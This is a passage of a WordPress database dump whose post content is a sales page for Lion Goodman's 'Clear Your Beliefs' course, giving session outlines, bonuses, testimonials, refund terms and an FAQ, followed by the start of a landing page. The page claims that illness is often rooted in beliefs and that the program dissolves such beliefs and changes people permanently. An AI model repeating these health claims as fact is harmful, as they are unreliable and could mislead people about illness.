src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today’s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a></p>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:36:45', '2014-12-14 19:36:45', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2055, 2, '2014-12-14 19:48:25', '2014-12-15 00:48:25', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>for iPhone & iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 10px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center;font-size: 14px;margin-bottom: -2px;padding:0 5px">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual 